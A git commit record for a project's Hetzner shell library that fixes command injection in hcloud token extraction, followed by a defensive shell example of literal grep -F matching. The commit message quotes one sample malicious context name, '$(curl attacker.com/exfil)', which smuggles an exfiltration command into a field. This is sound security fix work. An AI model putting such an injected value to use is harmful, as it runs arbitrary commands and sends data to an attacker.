spawn/hetzner/lib
A edb475e3d2
security: fix command injection in hetzner token extraction (#1418)
Fixes #1411

Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.

Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)

Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 14:08:31 -05:00
common.sh
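The hardened lookup pattern the commit describes, as an added shell example that is not the repository's own common.sh: the context name reaches grep -F as a single literal argument, so shell metacharacters in it are matched character-for-character and never evaluated. The tab-separated `name<TAB>token` file and the function names are constructed for illustration, not the real hcloud config layout.

```shell
#!/bin/sh
# Added example, not the project's common.sh. The context file format is a
# constructed stand-in (name<TAB>token), not the real hcloud config layout.

# Write a constructed sample context file and print its path.
# Single-quoted printf formats keep '$(id)' as literal text in the file.
write_sample_contexts() {
    f=$(mktemp)
    printf 'prod\ttok-prod-AAAA\n' > "$f"
    printf 'prod$(id)\ttok-literal-BBBB\n' >> "$f"
    printf 'staging\ttok-staging-CCCC\n' >> "$f"
    printf '%s\n' "$f"
}

# Print the token for a context name, or return 1 if it is not present.
# The name is passed as one argument (no xargs -I{} into a shell string):
#   -F  : fixed-string match, so the name is neither a regex nor shell text
#   --  : a name beginning with '-' cannot be parsed as a grep option
# The trailing tab in the pattern keeps "prod" from matching "prod-staging";
# the exact-name comparison afterwards rejects any remaining partial hit.
hetzner_token_for_context() {
    ctx="$1"
    file="$2"
    tab=$(printf '\t')
    token=$(grep -F -- "$ctx$tab" "$file" | while IFS="$tab" read -r name tok; do
        if [ "$name" = "$ctx" ]; then
            printf '%s\n' "$tok"
            break
        fi
    done)
    [ -n "$token" ] && printf '%s\n' "$token"
}

f=$(write_sample_contexts)
hetzner_token_for_context 'prod$(id)' "$f"   # prints tok-literal-BBBB; id is never run
```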